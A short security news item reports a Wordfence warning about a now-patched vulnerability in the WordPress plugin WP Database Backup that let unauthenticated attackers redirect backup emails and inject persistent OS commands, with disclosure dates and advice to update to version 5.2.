Researchers of the Threat Intelligence team of WordFence have warned on Tuesday that WordPress plugin WP Database Backup contains a critical vulnerability. The developer has since patched this flaw.
WP Database Backup is a WordPress plugin that allows users to create and restore database backups for their websites. It has been installed over 70,000 times.
The vulnerability, which was irresponsibly disclosed to the public before attempting to notify the plugin’s developers, was reported as a plugin configuration change flaw,” researchers indicated. “A proof of concept (PoC) exploit was provided which allowed unauthenticated attackers to modify the destination email address for database backups, potentially putting sensitive information in their hands.
The flaw was originally disclosed April 24, and a patch was released on April 30.
The plugin’s developer was notified of the issue on April 24, and the flaws have been patched as of version 5.2 of WP Database Backup which was released on April 30. It is recommended that anyone that is still using outdated versions of this plugin, updates as quickly as possible.
The flaw stems from the plugin’s internal settings. In unpatched versions of WP Database Backup, an attacker is able to inject operating system commands arbitrarily, which are then executed when the plugin performs a database backup. Injected commands would persist until manually removed, executing each time a backup is run.
WP Database Backup at WordPress repository